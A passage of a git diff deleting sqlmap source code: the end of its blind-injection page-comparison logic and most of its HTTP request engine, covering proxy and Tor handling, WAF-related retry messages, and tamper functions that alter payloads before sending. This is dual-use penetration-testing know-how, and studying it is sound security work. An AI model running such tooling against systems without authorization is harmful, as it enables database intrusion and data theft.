return conf.string in rawResponse - - # String to match in page when the query is False and/or invalid - if conf.notString: - return conf.notString not in rawResponse - - # Regular expression to match in page when the query is True and/or valid - if conf.regexp: - return re.search(conf.regexp, rawResponse, re.I | re.M) is not None - - # HTTP code to match when the query is valid - if conf.code: - return conf.code == code - - if page: - # In case of an DBMS error page return None - if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic: - return None - - # Dynamic content lines to be excluded before comparison - if not kb.nullConnection: - page = removeDynamicContent(page) - seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate)) - - if not pageLength: - pageLength = len(page) - - if kb.nullConnection and pageLength: - if not seqMatcher.a: - errMsg = "problem occurred while retrieving original page content " - errMsg += "which prevents sqlmap from continuation. Please rerun, " - errMsg += "and if the problem persists turn off any optimization switches" - raise SqlmapNoneDataException(errMsg) - - ratio = 1. * pageLength / len(seqMatcher.a) - - if ratio > 1.: - ratio = 1. / ratio - else: - # Preventing "Unicode equal comparison failed to convert both arguments to Unicode" - # (e.g. 
if one page is PDF and the other is HTML) - if isinstance(seqMatcher.a, str) and isinstance(page, unicode): - page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - elif isinstance(seqMatcher.a, unicode) and isinstance(page, str): - seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - - seq1, seq2 = None, None - - if conf.titles: - seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) - seq2 = extractRegexResult(HTML_TITLE_REGEX, page) - else: - seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a - seq2 = getFilteredPageContent(page, True) if conf.textOnly else page - - if seq1 is None or seq2 is None: - return None - - seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") - seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") - - while count < min(len(seq1), len(seq2)): - if seq1[count] == seq2[count]: - count += 1 - else: - break - - if count: - try: - _seq1 = seq1[count:] - _seq2 = seq2[count:] - except MemoryError: - pass - else: - seq1 = _seq1 - seq2 = _seq2 - - while True: - try: - seqMatcher.set_seq1(seq1) - except MemoryError: - seq1 = seq1[:len(seq1) / 1024] - else: - break - - while True: - try: - seqMatcher.set_seq2(seq2) - except MemoryError: - seq2 = seq2[:len(seq2) / 1024] - else: - break - - ratio = round(seqMatcher.quick_ratio(), 3) - - # If the url is stable and we did not set yet the match ratio and the - # current injected value changes the url page content - if kb.matchRatio is None: - if (count or ratio >= LOWER_RATIO_BOUND) and ratio <= UPPER_RATIO_BOUND: - kb.matchRatio = ratio - logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) - - # If it has been requested to return the ratio and not a comparison - # response - if getRatioValue: - return ratio - - elif ratio > UPPER_RATIO_BOUND: - return True - - elif ratio < LOWER_RATIO_BOUND: - return False - - elif kb.matchRatio is None: - return None - - else: - return (ratio - kb.matchRatio) 
> DIFF_TOLERANCE diff --git a/lib/request/connect.py b/lib/request/connect.py deleted file mode 100644 index c5d2eceb..00000000 --- a/lib/request/connect.py +++ /dev/null @@ -1,1146 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii -import compiler -import httplib -import json -import keyword -import logging -import re -import socket -import string -import struct -import time -import traceback -import urllib2 -import urlparse - -try: - import websocket - from websocket import WebSocketException -except ImportError: - class WebSocketException(Exception): - pass - -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.common import asciifyUrl -from lib.core.common import calculateDeltaSeconds -from lib.core.common import clearConsoleLine -from lib.core.common import cpuThrottle -from lib.core.common import dataToStdout -from lib.core.common import evaluateCode -from lib.core.common import extractRegexResult -from lib.core.common import findMultipartPostBoundary -from lib.core.common import getCurrentThreadData -from lib.core.common import getHeader -from lib.core.common import getHostHeader -from lib.core.common import getRequestHeader -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import logHTTPTraffic -from lib.core.common import pushValue -from lib.core.common import popValue -from lib.core.common import randomizeParameterValue -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import removeReflectiveValues -from lib.core.common import singleTimeLogMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.common import stdev -from lib.core.common import wasLastResponseDelayed -from lib.core.common import unicodeencode -from 
lib.core.common import urldecode -from lib.core.common import urlencode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import POST_HINT_CONTENT_TYPES -from lib.core.enums import ADJUST_TIME_DELAY -from lib.core.enums import AUTH_TYPE -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTP_HEADER -from lib.core.enums import HTTPMETHOD -from lib.core.enums import NULLCONNECTION -from lib.core.enums import PAYLOAD -from lib.core.enums import PLACE -from lib.core.enums import POST_HINT -from lib.core.enums import REDIRECTION -from lib.core.enums import WEB_API -from lib.core.exception import SqlmapCompressionException -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapSyntaxException -from lib.core.exception import SqlmapTokenException -from lib.core.exception import SqlmapValueException -from lib.core.settings import ASTERISK_MARKER -from lib.core.settings import BOUNDARY_BACKSLASH_MARKER -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR -from lib.core.settings import DEFAULT_CONTENT_TYPE -from lib.core.settings import DEFAULT_COOKIE_DELIMITER -from lib.core.settings import DEFAULT_GET_POST_DELIMITER -from lib.core.settings import EVALCODE_KEYWORD_SUFFIX -from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE -from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE -from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE -from lib.core.settings import MAX_CONNECTIONS_REGEX -from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE -from lib.core.settings import META_REFRESH_REGEX -from lib.core.settings import MIN_TIME_RESPONSES -from lib.core.settings import IS_WIN -from lib.core.settings import LARGE_CHUNK_TRIM_MARKER -from lib.core.settings import PAYLOAD_DELIMITER -from lib.core.settings import PERMISSION_DENIED_REGEX -from lib.core.settings import 
PLAIN_TEXT_CONTENT_TYPE -from lib.core.settings import RANDOM_INTEGER_MARKER -from lib.core.settings import RANDOM_STRING_MARKER -from lib.core.settings import REPLACEMENT_MARKER -from lib.core.settings import TEXT_CONTENT_TYPE_REGEX -from lib.core.settings import UNENCODED_ORIGINAL_VALUE -from lib.core.settings import URI_HTTP_HEADER -from lib.core.settings import WARN_TIME_STDEV -from lib.request.basic import decodePage -from lib.request.basic import forgeHeaders -from lib.request.basic import processResponse -from lib.request.direct import direct -from lib.request.comparison import comparison -from lib.request.methodrequest import MethodRequest -from thirdparty.multipart import multipartpost -from thirdparty.odict.odict import OrderedDict -from thirdparty.socks.socks import ProxyError - - -class Connect(object): - """ - This class defines methods used to perform HTTP requests - """ - - @staticmethod - def _getPageProxy(**kwargs): - return Connect.getPage(**kwargs) - - @staticmethod - def _retryProxy(**kwargs): - threadData = getCurrentThreadData() - threadData.retriesCount += 1 - - if conf.proxyList and threadData.retriesCount >= conf.retries: - warnMsg = "changing proxy" - logger.warn(warnMsg) - - conf.proxy = None - threadData.retriesCount = 0 - - setHTTPHandlers() - - if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: - # timed based payloads can cause web server unresponsiveness - # if the injectable piece of code is some kind of JOIN-like query - warnMsg = "most probably web server instance hasn't recovered yet " - warnMsg += "from previous timed based payload. If the problem " - warnMsg += "persists please wait for few minutes and rerun " - warnMsg += "without flag T in option '--technique' " - warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " - warnMsg += "lower the value of option '--time-sec' (e.g. 
'--time-sec=2')" - singleTimeWarnMessage(warnMsg) - - elif kb.originalPage is None: - if conf.tor: - warnMsg = "please make sure that you have " - warnMsg += "Tor installed and running so " - warnMsg += "you could successfully use " - warnMsg += "switch '--tor' " - if IS_WIN: - warnMsg += "(e.g. 'https://www.torproject.org/download/download.html.en')" - else: - warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" - else: - warnMsg = "if the problem persists please check that the provided " - warnMsg += "target URL is valid. In case that it is, you can try to rerun " - warnMsg += "with the switch '--random-agent' turned on " - warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" - singleTimeWarnMessage(warnMsg) - - elif conf.threads > 1: - warnMsg = "if the problem persists please try to lower " - warnMsg += "the number of used threads (option '--threads')" - singleTimeWarnMessage(warnMsg) - - kwargs['retrying'] = True - return Connect._getPageProxy(**kwargs) - - @staticmethod - def _connReadProxy(conn): - retVal = "" - - if not kb.dnsMode and conn: - headers = conn.info() - if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\ - or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): - retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) - if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: - warnMsg = "large compressed response detected. Disabling compression" - singleTimeWarnMessage(warnMsg) - kb.pageCompress = False - else: - while True: - if not conn: - break - else: - _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) - - if len(_) == MAX_CONNECTION_CHUNK_SIZE: - warnMsg = "large response detected. 
This could take a while" - singleTimeWarnMessage(warnMsg) - _ = re.sub(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start), "%s%s%s" % (kb.chars.stop, LARGE_CHUNK_TRIM_MARKER, kb.chars.start), _) - retVal += _ - else: - retVal += _ - break - - if len(retVal) > MAX_CONNECTION_TOTAL_SIZE: - warnMsg = "too large response detected. Automatically trimming it" - singleTimeWarnMessage(warnMsg) - break - - return retVal - - @staticmethod - def getPage(**kwargs): - """ - This method connects to the target URL or proxy and returns - the target URL page content - """ - - if isinstance(conf.delay, (int, float)) and conf.delay > 0: - time.sleep(conf.delay) - elif conf.cpuThrottle: - cpuThrottle(conf.cpuThrottle) - - if conf.offline: - return None, None, None - elif conf.dummy: - return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None - - threadData = getCurrentThreadData() - with kb.locks.request: - kb.requestCounter += 1 - threadData.lastRequestUID = kb.requestCounter - - url = kwargs.get("url", None) or conf.url - get = kwargs.get("get", None) - post = kwargs.get("post", None) - method = kwargs.get("method", None) - cookie = kwargs.get("cookie", None) - ua = kwargs.get("ua", None) or conf.agent - referer = kwargs.get("referer", None) or conf.referer - host = kwargs.get("host", None) or conf.host - direct_ = kwargs.get("direct", False) - multipart = kwargs.get("multipart", False) - silent = kwargs.get("silent", False) - raise404 = kwargs.get("raise404", True) - timeout = kwargs.get("timeout", None) or conf.timeout - auxHeaders = kwargs.get("auxHeaders", None) - response = kwargs.get("response", False) - ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout - refreshing = kwargs.get("refreshing", False) - retrying = kwargs.get("retrying", False) - crawling = kwargs.get("crawling", False) - skipRead = kwargs.get("skipRead", False) - - websocket_ = url.lower().startswith("ws") - - if not 
urlparse.urlsplit(url).netloc: - url = urlparse.urljoin(conf.url, url) - - # flag to know if we are dealing with the same target host - target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) - - if not retrying: - # Reset the number of connection retries - threadData.retriesCount = 0 - - # fix for known issue when urllib2 just skips the other part of provided - # url splitted with space char while urlencoding it in the later phase - url = url.replace(" ", "%20") - - conn = None - code = None - page = None - - _ = urlparse.urlsplit(url) - requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) - requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url - responseMsg = u"HTTP response " - requestHeaders = u"" - responseHeaders = None - logHeaders = u"" - skipLogTraffic = False - - raise404 = raise404 and not kb.ignoreNotFound - - # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't - # support those by default - url = asciifyUrl(url) - - try: - socket.setdefaulttimeout(timeout) - - if direct_: - if '?' 
in url: - url, params = url.split('?', 1) - params = urlencode(params) - url = "%s?%s" % (url, params) - - elif multipart: - # Needed in this form because of potential circle dependency - # problem (option -> update -> connect -> option) - from lib.core.option import proxyHandler - - multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) - conn = multipartOpener.open(unicodeencode(url), multipart) - page = Connect._connReadProxy(conn) if not skipRead else None - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - - return page - - elif any((refreshing, crawling)): - pass - - elif target: - if conf.forceSSL and urlparse.urlparse(url).scheme != "https": - url = re.sub("\Ahttp:", "https:", url, re.I) - url = re.sub(":80/", ":443/", url, re.I) - - if PLACE.GET in conf.parameters and not get: - get = conf.parameters[PLACE.GET] - - if not conf.skipUrlEncode: - get = urlencode(get, limit=True) - - if get: - if '?' 
in url: - url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get) - requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get) - else: - url = "%s?%s" % (url, get) - requestMsg += "?%s" % get - - if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET: - post = conf.parameters[PLACE.POST] - - elif get: - url = "%s?%s" % (url, get) - requestMsg += "?%s" % get - - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - - # Prepare HTTP headers - headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}) - - if HTTP_HEADER.COOKIE in headers: - cookie = headers[HTTP_HEADER.COOKIE] - - if kb.authHeader: - headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader - - if kb.proxyAuthHeader: - headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader - - if not getHeader(headers, HTTP_HEADER.ACCEPT): - headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE - - if not getHeader(headers, HTTP_HEADER.HOST) or not target: - headers[HTTP_HEADER.HOST] = getHostHeader(url) - - if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): - headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" - - if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): - headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) - - if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: - warnMsg = "missing 'boundary parameter' in '%s' header. 
" % HTTP_HEADER.CONTENT_TYPE - warnMsg += "Will try to reconstruct" - singleTimeWarnMessage(warnMsg) - - boundary = findMultipartPostBoundary(conf.data) - if boundary: - headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) - - # Reset header values to original in case of provided request file - if target and conf.requestFile: - headers = OrderedDict(conf.httpHeaders) - if cookie: - headers[HTTP_HEADER.COOKIE] = cookie - - if auxHeaders: - for key, value in auxHeaders.items(): - for _ in headers.keys(): - if _.upper() == key.upper(): - del headers[_] - headers[key] = value - - for key, value in headers.items(): - del headers[key] - value = unicodeencode(value, kb.pageEncoding) - for char in (r"\r", r"\n"): - value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", value) - headers[unicodeencode(key, kb.pageEncoding)] = value.strip("\r\n") - - url = unicodeencode(url) - post = unicodeencode(post) - - if websocket_: - ws = websocket.WebSocket() - ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie) # WebSocket will add Host field of headers automatically - ws.send(urldecode(post or "")) - page = ws.recv() - ws.close() - code = ws.status - status = httplib.responses[code] - class _(dict): - pass - responseHeaders = _(ws.getheaders()) - responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] - - requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) - requestMsg += "\n%s" % requestHeaders - - if post is not None: - requestMsg += "\n\n%s" % getUnicode(post) - - requestMsg += "\n" - - threadData.lastRequestMsg = requestMsg - - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - else: - if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST): - method = unicodeencode(method) - req = MethodRequest(url, post, 
headers) - req.set_method(method) - else: - req = urllib2.Request(url, post, headers) - - requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()) - - if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: - conf.cj._policy._now = conf.cj._now = int(time.time()) - cookies = conf.cj._cookies_for_request(req) - requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) - - if post is not None: - if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH): - requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) - - if not getRequestHeader(req, HTTP_HEADER.CONNECTION): - requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION - - requestMsg += "\n%s" % requestHeaders - - if post is not None: - requestMsg += "\n\n%s" % getUnicode(post) - - requestMsg += "\n" - - threadData.lastRequestMsg = requestMsg - - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - if conf.cj: - for cookie in conf.cj: - if cookie.value is None: - cookie.value = "" - else: - for char in (r"\r", r"\n"): - cookie.value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", cookie.value) - - conn = urllib2.urlopen(req) - - if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): - kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) - - if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION): - kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION) - - # Return response object - if response: - return conn, None, None - - # Get HTTP response - if hasattr(conn, 'redurl'): - page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ - else Connect._connReadProxy(conn)) if not skipRead else None - skipLogTraffic = 
kb.redirectChoice == REDIRECTION.NO - code = conn.redcode - else: - page = Connect._connReadProxy(conn) if not skipRead else None - - code = code or conn.code - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - status = getUnicode(conn.msg) - - if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: - refresh = extractRegexResult(META_REFRESH_REGEX, page) - - debugMsg = "got HTML meta refresh header" - logger.debug(debugMsg) - - if kb.alwaysRefresh is None: - msg = "sqlmap got a refresh request " - msg += "(redirect like response common to login pages). " - msg += "Do you want to apply the refresh " - msg += "from now on (or stay on the original page)? [Y/n]" - choice = readInput(msg, default="Y") - - kb.alwaysRefresh = choice not in ("n", "N") - - if kb.alwaysRefresh: - if re.search(r"\Ahttps?://", refresh, re.I): - url = refresh - else: - url = urlparse.urljoin(url, refresh) - - threadData.lastRedirectMsg = (threadData.lastRequestUID, page) - kwargs['refreshing'] = True - kwargs['url'] = url - kwargs['get'] = None - kwargs['post'] = None - - try: - return Connect._getPageProxy(**kwargs) - except SqlmapSyntaxException: - pass - - # Explicit closing of connection object - if conn and not conf.keepAlive: - try: - if hasattr(conn.fp, '_sock'): - conn.fp._sock.close() - conn.close() - except Exception, ex: - warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex) - logger.warn(warnMsg) - - except urllib2.HTTPError, ex: - page = None - responseHeaders = None - - try: - page = ex.read() if not skipRead else None - responseHeaders = ex.info() - responseHeaders[URI_HTTP_HEADER] = ex.geturl() - page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - except socket.timeout: - warnMsg = "connection timed out while 
trying " - warnMsg += "to get error page information (%d)" % ex.code - logger.warn(warnMsg) - return None, None, None - except KeyboardInterrupt: - raise - except: - pass - finally: - page = page if isinstance(page, unicode) else getUnicode(page) - - code = ex.code - - kb.originalCode = kb.originalCode or code - threadData.lastHTTPError = (threadData.lastRequestUID, code) - kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - - status = getUnicode(ex.msg) - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) - - if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) - - logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) - - skipLogTraffic = True - - if conf.verbose <= 5: - responseMsg += getUnicode(logHeaders) - elif conf.verbose > 5: - responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - - if ex.code == httplib.UNAUTHORIZED and not conf.ignore401: - errMsg = "not authorized, try to provide right HTTP " - errMsg += "authentication type and valid credentials (%d)" % code - raise SqlmapConnectionException(errMsg) - elif ex.code == httplib.NOT_FOUND: - if raise404: - errMsg = "page not found (%d)" % code - raise SqlmapConnectionException(errMsg) - else: - debugMsg = "page not found (%d)" % code - singleTimeLogMessage(debugMsg, logging.DEBUG) - processResponse(page, responseHeaders) - elif ex.code == httplib.GATEWAY_TIMEOUT: - if ignoreTimeout: - return None, None, None - else: - warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code]) - if threadData.retriesCount < conf.retries and not kb.threadException: - warnMsg += ". 
sqlmap is going to retry the request" - logger.critical(warnMsg) - return Connect._retryProxy(**kwargs) - elif kb.testMode: - logger.critical(warnMsg) - return None, None, None - else: - raise SqlmapConnectionException(warnMsg) - else: - debugMsg = "got HTTP error code: %d (%s)" % (code, status) - logger.debug(debugMsg) - - except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError): - tbMsg = traceback.format_exc() - - if "no host given" in tbMsg: - warnMsg = "invalid URL address used (%s)" % repr(url) - raise SqlmapSyntaxException(warnMsg) - elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg: - warnMsg = "connection was forcibly closed by the target URL" - elif "timed out" in tbMsg: - singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)") - conf.disablePrecon = True - - if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): - singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests") - warnMsg = "connection timed out to the target URL" - elif "URLError" in tbMsg or "error" in tbMsg: - warnMsg = "unable to connect to the target URL" - elif "NTLM" in tbMsg: - warnMsg = "there has been a problem with NTLM authentication" - elif "BadStatusLine" in tbMsg: - warnMsg = "connection dropped or unknown HTTP " - warnMsg += "status code received" - if not conf.agent and not conf.randomAgent: - warnMsg += ". 
Try to force the HTTP User-Agent " - warnMsg += "header with option '--user-agent' or switch '--random-agent'" - elif "IncompleteRead" in tbMsg: - warnMsg = "there was an incomplete read error while retrieving data " - warnMsg += "from the target URL" - elif "Handshake status" in tbMsg: - status = re.search("Handshake status ([\d]{3})", tbMsg) - errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown" - raise SqlmapConnectionException(errMsg) - else: - warnMsg = "unable to connect to the target URL" - - if "BadStatusLine" not in tbMsg: - warnMsg += " or proxy" - - if silent: - return None, None, None - elif "forcibly closed" in tbMsg: - logger.critical(warnMsg) - return None, None, None - elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")): - return None, None, None - elif threadData.retriesCount < conf.retries and not kb.threadException: - warnMsg += ". sqlmap is going to retry the request" - if not retrying: - warnMsg += "(s)" - logger.critical(warnMsg) - else: - logger.debug(warnMsg) - return Connect._retryProxy(**kwargs) - elif kb.testMode: - logger.critical(warnMsg) - return None, None, None - else: - raise SqlmapConnectionException(warnMsg) - - finally: - if isinstance(page, basestring) and not isinstance(page, unicode): - if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): - page = unicode(page, errors="ignore") - else: - page = getUnicode(page) - socket.setdefaulttimeout(conf.timeout) - - processResponse(page, responseHeaders) - - if conn and getattr(conn, "redurl", None): - _ = urlparse.urlsplit(conn.redurl) - _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) - requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) - - if kb.resendPostOnRedirect is False: - requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg) - 
requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg) - requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg) - - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status) - else: - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) - - if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) - - if not skipLogTraffic: - logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) - - if conf.verbose <= 5: - responseMsg += getUnicode(logHeaders) - elif conf.verbose > 5: - responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - - return page, responseHeaders, code - - @staticmethod - def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): - """ - This method calls a function to get the target URL page content - and returns its page MD5 hash or a boolean value in case of - string match check ('--string' command line parameter) - """ - - if conf.direct: - return direct(value, content) - - get = None - post = None - cookie = None - ua = None - referer = None - host = None - page = None - pageLength = None - uri = None - code = None - - if not place: - place = kb.injection.place or PLACE.GET - - if not auxHeaders: - auxHeaders = {} - - raise404 = place != PLACE.URI if raise404 is None else raise404 - method = method or conf.method - - value = agent.adjustLateValues(value) - payload = agent.extractPayload(value) - threadData = getCurrentThreadData() - - if conf.httpHeaders: - headers = OrderedDict(conf.httpHeaders) - contentType = max(headers[_] if _.upper() == 
HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) - - if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: - kb.postUrlEncode = False - conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] - contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) - conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) - - if payload: - if kb.tamperFunctions: - for function in kb.tamperFunctions: - try: - payload = function(payload=payload, headers=auxHeaders) - except Exception, ex: - errMsg = "error occurred while running tamper " - errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex)) - raise SqlmapGenericException(errMsg) - - if not isinstance(payload, basestring): - errMsg = "tamper function '%s' returns " % function.func_name - errMsg += "invalid payload type ('%s')" % type(payload) - raise SqlmapValueException(errMsg) - - value = agent.replacePayload(value, payload) - - logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\')) - - if place == PLACE.CUSTOM_POST and kb.postHint: - if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): - # payloads in SOAP/XML should have chars > and < replaced - # with their HTML encoded counterparts - payload = payload.replace('>', ">").replace('<', "<") - elif kb.postHint == POST_HINT.JSON: - if payload.startswith('"') and payload.endswith('"'): - payload = json.dumps(payload[1:-1]) - else: - payload = json.dumps(payload)[1:-1] - elif kb.postHint == POST_HINT.JSON_LIKE: - payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') - if payload.startswith('"') and payload.endswith('"'): - payload = json.dumps(payload[1:-1]) - else: - payload = json.dumps(payload)[1:-1] - payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') - value = agent.replacePayload(value, payload) - 
